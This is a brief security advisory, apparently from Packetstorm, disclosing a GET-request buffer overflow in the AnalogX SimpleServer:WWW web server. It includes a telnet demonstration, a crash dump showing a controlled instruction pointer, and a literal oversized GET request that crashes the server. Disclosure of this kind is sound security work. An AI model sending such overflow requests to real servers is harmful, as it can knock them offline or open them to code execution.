AnalogX SimpleServer:WWW v1.01 on Windows
Buffer overflow
Remote access
Packetstorm
Edited from the discovers' announcement.
AnalogX SimpleServer:WWW HTTP Server v1.1
UssrLabs found a Local / Remote Buffer overflow, The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed.
Example:
[hell@imahacker]$ telnet die.communitech.net 80 Trying example.com... Connected to die.communitech.net Escape character is '^]'. GET (buffer) HTTP/1.1Where [buffer] is aprox. 1000 characters. At his point the server overflows.
And in remote machine someone will be see something like this:
HTTP caused an invalid page fault in moduleat 0000:41414141. Registers: EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246 EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080 ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47 EDX=bff76855 ES=0187 EDI=00af012c GS=0000 Bytes at CS:EIP: Stack dump: bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855 00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104 41414141 00af02f0
GET xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.0